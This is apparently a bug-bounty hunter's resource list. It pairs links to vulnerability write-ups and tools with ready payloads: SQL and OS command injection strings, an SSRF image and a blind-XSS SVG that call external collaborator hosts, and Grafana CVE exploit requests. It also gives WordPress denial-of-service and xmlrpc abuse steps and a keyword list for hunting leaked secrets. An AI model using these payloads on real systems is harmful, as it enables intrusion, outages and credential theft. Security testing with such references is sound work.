Write-ups of All types Bugs

---

Bug Bounty Writeups and exploit‘s resource

2FA

1. 2fa bypass technique
https://www.mindmeister.com/1736437018?t=SEeZOmvt01

2. Two-factor authentication security testing and possible bypasses
https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35

403 Forbidden Bypass

https://dewangpanchal98.medium.com/403-forbidden-bypass-fc8b5df109b7

AEM applications Vulnerabilities

https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=9

AWS-S3-Bucket

Testing for unauthorized file uploads on misconfigured AWS S3 buckets
https://alph4byt3.medium.com/testing-for-unauthorized-file-uploads-on-misconfigured-aws-s3-buckets-c114f7653893

aws pentesting
https://infosecwriteups.com/deep-dive-into-aws-penetration-testing-a99192a26898

Bypassing and exploiting Bucket Upload Policies and Signed URLs
https://labs.detectify.com/2018/08/02/bypassing-exploiting-bucket-upload-policies-signed-urls/

How To Scan AWS's Entire IP Range to Recon SSL Certificates
https://www.daehee.com/scan-aws-ip-ssl-certificates/

Adding email checklist

Adding email checklist
https://docs.google.com/presentation/d/18EROY7aLfy6omx3-KTjUnAfOuh3UP5UiAnSc__uuRV4/mobilepresent?slide=id.ge49d443037_0_310

Auto-Recon

Rengine

https://github.com/yogeshojha/rengine#quick-installation

CSV-Injection

Bug in Export to Spreadsheet functionality in web applications

1. Details
https://www.contextis.com/en/blog/comma-separated-vulnerabilities

2. Hackerone Report
https://hackerone.com/reports/928280

CVES

CVE-2020-11022/CVE-2020-11023
https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html

CVE-2020-11110
https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html

version : Grafana v6.2.5

authentication : v6.2.5 not required to be authenticated

send post request to /api/snapshots with the following json body

{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
CVE-2021-24169

WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)

wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
CVE-2021-40875
Improper Access Control in Gurock TestRail versions ≤ 7.2.0.3014 results in sensitive file exposure

/files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure hardcoded credentials, API keys, or other sensitive data.

CVE-2021-26084

Remote Code Execution on Confluence Servers

https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Contact-support-page

1. Target Contact page tips
https://docs.google.com/presentation/d/1wqx9fnr9v451FHdU33XeXBIg3b_pfhF9X0ttkydrGlk/mobilepresent?slide=id.gb07b8690e7_0_156

Create edit remove ORG checklist

Checklist

https://docs.google.com/presentation/d/1E5zjGcnqSe7asDreGPgBS2T-bAJ5siuE0QKvJnX91Cw/mobilepresent?slide=id.ge2f51227b3_0_158

Cross-Site WebSocket Hijack

Cross-Site WebSocket Hijack
https://github.com/DeepakPawar95/cswsh

https://sunilyedla.medium.com/websocket-hijacking-to-steal-session-id-of-victim-users-bca84243830

DNS-misconfiguration

Dns misconfig details
https://resources.infosecinstitute.com/topic/dns-hacking/

Misconfigure Zone transfer
https://www.cybrary.it/blog/0p3n/find-dns-zone-transfer-misconfiguration/

DOS

1. denial of service with web cache poisoning
https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning

2. DOS using
(((((()0)))))

https://hackerone.com/reports/993582?__cf_chl_jschl_tk__=pmd_d4edfa2689d4773535bd4991c5ac1b735467eca6-1628409964-0-gqNtZGzNAeKjcnBszQ0O

Email_Injection

https://pentestbook.six2dez.com/enumeration/web/email-attacks

File-Upload

1.
https://blog.yeswehack.com/yeswerhackers/exploitation/file-upload-attacks-part-1/

2.
https://thevillagehacker.medium.com/remote-code-execution-due-to-unrestricted-file-upload-153be0009934

3.
https://secgeek.net/bookfresh-vulnerability/

4.
https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a

https://portswigger.net/kb/issues/00500980_file-upload-functionality

https://labs.detectify.com/2015/05/28/building-an-xss-polyglot-through-swf-and-csp/

https://hackerone.com/reports/191380

https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/mobilepresent?slide=id.ga2ef157b83_0_156

Firebase-Databas-Takeover

Firebase Database Takeover
https://danangtriatmaja.medium.com/firebase-database-takover-b7929bbb62e1

https://medium.com/@fs0c131y/how-i-found-the-database-of-the-donald-daters-app-af88b06e39ad

Get-into-BugBounty

Vickie Li writeup
https://medium.com/swlh/mastering-the-skills-of-bug-bounty-2201eb6a9f4

Graphql

Exploiting graphql
https://blog.assetnote.io/2021/08/29/exploiting-graphql/

HTTP-method-testing

1. Http method testing by owasp
https://wiki.owasp.org/index.php/Test_HTTP_Methods_(OTG-CONFIG-006)

Hunting-on-aspx-application

1. Hunting on ASPX Application For P1's [Unauthenticated SOAP,RCE, Info Disclosure]
https://0u.ma/m/3

ICMP Attacks

https://resources.infosecinstitute.com/topic/icmp-attacks/

JIRA-exploit-resources

JIRA cve exploits
https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c

JS-analysis

1. Analysis of Client-Side JavaScript
https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288

2.
https://infosecwriteups.com/one-token-to-leak-them-all-the-story-of-a-8000-npm-token-79b13af182a3

3. linkfinder tool
https://github.com/GerbenJavado/LinkFinder

4. Tool to Find js from a web
https://github.com/robre/scripthunter

5. a javascript change monitoring tool
https://github.com/robre/jsmon

6. Url teacking for changes
https://github.com/ahussam/url-tracker

7.This is a command line tool I use when I want to get notified, on Telegram (on my phone), that something has finished running (on my laptop)
https://github.com/ShutdownRepo/telegram-bot-cli

8. Static Analysis of Client-Side JavaScript
https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288

JWT

1. JWT automated vulnerability scanner
https://hackerone.com/reports/993582?__cf_chl_jschl_tk__=pmd_d4edfa2689d4773535bd4991c5ac1b735467eca6-1628409964-0-gqNtZGzNAeKjcnBszQ0O

Java Deserialization

1. Java Deserialization scanner
https://github.com/joaomatosf/jexboss

Laravel-RCE

https://infosecwriteups.com/rce-on-a-laravel-private-program-2fb16cfb9f5c

Login_page

1. Login page checklist
https://docs.google.com/presentation/d/1lGMRCYJo9d66A3rIVNbTk3thn76uc9Gyp8Gpu9mZHQ8/mobilepresent?slide=id.gac49ca7b44_0_158

MY-Recon

Subdomain enumeration
subfinder -d domain.com -o file1.txt assetfinder domain.com -o file2.txt amass enum -d domain.com | teee -a file3.txt

Nginx

https://github.com/stark0de/nginxpwner

OAuth-Vulnerability

1. OAuth Checklist
https://www.binarybrotherhood.io/oauth2_threat_model.html

2. OAuth Misconfiguration in small time-window of attack
https://muhammad-aamir.medium.com/oauth-misconfiguration-found-in-small-time-window-of-attack-b585afcb94c6

3.
https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1

4. Oauth checklist
https://docs.google.com/presentation/d/1eu_b8jqrjr0OeetbrNHWPy9KCh8J1GEjuA4CeiRWokI/mobilepresent?slide=id.ga30804010b_0_0

5. Pre-Access to Victim’s Account via Facebook Signup
https://akshanshjaiswal.medium.com/pre-access-to-victims-account-via-facebook-signup-60219e9e381d

Reconnaissance

1.
https://infosecwriteups.com/guide-to-basic-recon-bug-bounties-recon-728c5242a115

2.
https://bendtheory.medium.com/finding-and-exploiting-unintended-functionality-in-main-web-app-apis-6eca3ef000af

3.
https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html

4.
OWASP Top 10: The Ultimate Guide

5. Recon nahamsec
https://docs.google.com/presentation/d/15bdwuAJKwhVwlcijKOXZFI5ZTJT1PdcMUblJVu6dJyU/mobilepresent?slide=id.gc7305a35cd_0_119

6.
https://www.bugbountyhunter.com/mobile/tutorials-and-guides

7. Scope based Recon
https://blog.cobalt.io/scope-based-recon-smart-recon-tactics-7e72d590eae5

8. Mind Map
https://github.com/imran-parray/Mind-Maps

9. Github Recon
https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82

10. Recon methodology by @xcheater
https://infosecwriteups.com/recon-methodology-for-bug-hunting-e623120a7ca6

11.
https://docs.google.com/presentation/d/18o6fwqZB8wqHFYl2M5SO5KMzct8NKVW7G3edgi0XXJk/mobilepresent?slide=id.ge4fdf9c97a_0_316

12. Pentesterland
https://pentester.land/cheatsheets/2019/04/15/recon-resources.html

SQL-Injection

1. SQL checklist
https://www.notion.so/SQL-INJECTION-e89cf8a972d24a239821b4449f34f4e0

2.
https://sapt.medium.com/sqli-on-a-bugcrowd-private-program-17858b57ec61

')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--

SSO

1. SSO Checklist
https://docs.google.com/presentation/d/1bxBL0HyL8pbDUsa00abfbfEoawmx-XsVIkUjF_V2-_I/mobilepresent?slide=id.gaa585d4e81_0_156

SSRF

1. SSRF bible
https://docs.google.com/document/u/0/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/mobilebasic#h.3ndar9ni0n0h

2. Tips and tricks for ssrf
https://highon.coffee/blog/ssrf-cheat-sheet/#identifying-potential-locations-for-ssrf

3. SSRF payload in image upload
<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="200px" height="200px" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><image xlink:href="https://1y0ry36zsloshorypw4jca32mtsjg8.burpcollaborator.net/" x="0" y="0" height="200px" width="200px"/></svg>

4. Bypass by redirect through own server
https://infosecwriteups.com/an-exciting-journey-to-find-ssrf-bypass-cloudflare-and-extract-aws-metadata-fdb8be0b5f79

https://d0nut.medium.com/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5

SSTI

1. portswigger SSTI
https://portswigger.net/web-security/server-side-template-injection

2.
https://verneet.com/fuzzing-77-till-p1/

3.
https://gauravnarwani.com/injecting-6200-to-1200/

4. SSTI wordlist for fuzzing
https://github.com/err0rr/SSTI/blob/master/Wordlist

5.
https://verneet.com/fuzzing-77-till-p1/

Scripting

Oneliner Script
https://github.com/dwisiswant0/awesome-oneliner-bugbounty#pure-bash-linkfinder

Setting-page-Checklist

1. Settings page checklist
https://docs.google.com/presentation/d/11Aa5PkGswQdZo3sLYbB8PAFfgGLocDpRujaGf5v6g70/mobilepresent?slide=id.gae8ab10c68_0_156

Shopping-Application

1. Vulnerabilities in shopping application
https://docs.google.com/presentation/d/1yMLYZbjERTeojwjve7Yh6Pojvljnl0UVAKTY9i-ZaSE/mobilepresent?slide=id.gb240823d22_0_155

Subdomain Enumeration

1. DNS subdomain scanner
https://github.com/rbsec/dnscan

2. Subdomain Enumeration
https://sidxparab.gitbook.io/subdomain-enumeration-guide/introduction/whats-the-need

Wordlist

1.collection of wordlist
https://github.com/heilla/SecurityTesting/blob/master/wordlists/Collection%20of%20wordlists.md

2. Dictionary list
https://gist.github.com/mrofisr/5010dcb4321c99329c932aaeb3172a8a

3. Common speak wordlist
https://github.com/pentester-io/commonspeak

WriteUps

1. hackerone
https://hackerone.com/hacktivity

2. Bugreader
https://bugreader.com/reports

3. Hackerone Reports poc videos
https://github.com/bminossi/AllVideoPocsFromHackerOne

4. Pentesrer land
https://pentester.land/list-of-bug-bounty-writeups.html

5. Sillydaddy
https://www.sillydaddy.me/

XSS

1. Browser's XSS Filter Bypass Cheat Sheet
https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet

2. Stored XSS using file upload
https://medium.com/@vis_hacker/how-i-got-stored-xss-using-file-upload-5c33e19df51e

3. XSS Through Parameter Pollution
https://infosecwriteups.com/xss-through-parameter-pollution-9a55da150ab2

4. XSS via HTTP Headers
https://brutelogic.com.br/blog/xss-via-http-headers/

5. Blind XSS in svg file
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
  "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  <svg width="200"
       height="200"
       zoomAndPan="disable"
       xmlns="http://www.w3.org/2000/svg"
       xmlns:xlink="http://www.w3.org/1999/xlink"
       xml:space="preserve">
    <!-- Script linked from the outside-->
    <script xlink:href="https://smaul1.xss.ht" />
    <script>
      //<![CDATA[
        alert("Smaul");
      ]]>
    </script>
  </svg>

email-verification

1.
https://infosecwriteups.com/email-verification-bypass-a-strange-case-f38291866126

2. Email bounce
https://infosecwriteups.com/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68

identify what something is

Identify anything. pyWhat easily lets you identify emails, IP addresses, and more
https://github.com/bee-san/pywhat

reset-password

https://docs.google.com/presentation/d/1QzBl3k3n2q44ULyfZgr_gPZexj8nF5vD8JrS5AUJRbs/mobilepresent?slide=id.gac68916404_0_19

tools

Subdomain Enum Tools
https://github.com/projectdiscovery/subfinder
https://github.com/OWASP/Amass
https://github.com/hannob/tlshelpers/blob/master/getsubdomain
https://github.com/tomnomnom/assetfinder

Get Subdomains from IPs
https://github.com/SpiderLabs/HostHunter
https://github.com/infosec-au/altdns
https://github.com/ProjectAnte/dnsgen
https://github.com/blechschmidt/massdns
Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
https://github.com/lc/gau

Github Recon
https://github.com/techgaun/github-dorks
https://github.com/michenriksen/gitrob
https://github.com/eth0izzle/shhgit
https://github.com/anshumanbh/git-all-secrets
https://github.com/hisxo/gitGraber
Get alerted if a new subdomain appears on the target
https://github.com/yassineaboukir/sublert

1. Big bounty tools by m4ll0k
https://github.com/m4ll0k/Bug-Bounty-Toolz

web-shell

https://github.com/tennc/webshell/blob/master/README_EN.md

WordPress

1. Create database
/wp-admin with 403 status 
Bypass it using /wp-admin/setup-config.php?step=1
This will allow you to create a database

2. xmlrpc.php
This is one of the common issue on wordpress. To get some bucks with this misconfiguration you must have to exploit it fully, and have to show the impact properly as well.

Detection
visit site.com/xmlrpc.php
Get the error message about POST request only
Exploit
Intercept the request and change the method GET to POST
List all Methods
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Check the pingback.ping mentod is there or not
Perform DDOS
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
Perform SSRF (Internal PORT scan only)
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

3. WP User Enumeration
This issue will only acceptable when target website is hiding their current users or they are not publically available. So attacker can use those user data for bruteforcing and other staff

Detection
visit site.com/wp-json/wp/v2/users/
http://target.com/?author=1
http://target.com/?rest_route=/wp/v2/users
You will see json data with user info in response

4. Denial of Service via load-scripts.php
http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
h1 report

5. Denial of Service via load-styles.php
http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic

6. Log files exposed
http://target.com/wp-content/debug.log

7. Backup file wp-config exposed
.wp-config.php.swp
wp-config.inc
wp-config.old
wp-config.txt
wp-config.html
wp-config.php.bak
wp-config.php.dist
wp-config.php.inc
wp-config.php.old
wp-config.php.save
wp-config.php.swp
wp-config.php.txt
wp-config.php.zip
wp-config.php.html
wp-config.php~
WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>

GitHub-Dorks

1. Github Dorks

https://docs.google.com/presentation/d/1lqBriLkclVwCi4q_VhJUXa-GYehLsMp054PzN4qrTn8/mobilepresent?slide=id.g9e14b666d8_0_147

2. Automation for found high entropy string in git repo
https://github.com/trufflesecurity/truffleHog

SearchEngine

1. Search Engine dorks
https://docs.google.com/presentation/d/1dBXWUFKXa6gWQNCifN939Wf1ZNTIELlRZ4FhcaHvSOE/mobilepresent?slide=id.gce482a8cc4_0_310

TravisCI

1. Automation for fetches repos, builds, and logs for any given organization from TravisCI
https://github.com/lc/secretz

os command injection

|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 
|nslookup -q=cname my.burpcollaborator.net.&

Grafana

1. CVE-2020-13379 (Denial of Service)
<GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D

2. CVE-2020-11110 (Stored XSS)
POST /api/snapshots HTTP/1.1
Host: <GRAFANA URL>
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
content-type: application/json
Connection: close

{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}

3. CVE-2019-15043 (Grafana Unauthenticated API)
POST /api/snapshots HTTP/1.1
Host: <GRAFANA URL>
Connection: close
Content-Length: 235
Accept: */*
Accept-Language: en
Content-Type: application/json

{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}

4. Default Credentials
Try to login using admin as username and password

5. Signup Enabled
<GRAFANA URL>/signup

Admin access Endpoint

/dev/register/
/stag/register/
/dev/login/
/register/
/internal/
/stag/

Admin access Subdomains

dev
stag
admin
internal
stag-dev
stag-admin
internal-dev

Os command injection

/cgi-bin/parameter=payload

WordPress wordlist

wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml
wp-admin/setup-config.php?step=1

Wordlist for Secret Find secret in js and github

cloudinary://
CONFIG
DB_NAME
DB_USER
DB_PASSWORD
DB_HOST
bucket name
Jenkins
OTP
oauth
authoriztion
password
pwd
ftp
dotfiles
JDBC
key-keys
send_key-keys
send,key-keys
token
user
login-signin
passkey-passkeys
pass
secret
SecretAccessKey
app_AWS_SECRET_ACCESS_KEY AWS_SECRET_ACCESS_KEY
credentials
config
security_credentials
connectionstring
ssh2_auth_password
aws_access_key
aws_secret_key
S3_BUCKET
S3_ACCESS_KEY_ID
S3_SECRET_ACCESS_KEY_ID
S3_ENDPOINT
AWS_ACCESS_KEY_ID
list_aws_accounts
SMTP password

github-wordlist-link

https://github.com/heilla/SecurityTesting/blob/master/wordlists/Collection%20of%20wordlists.md

---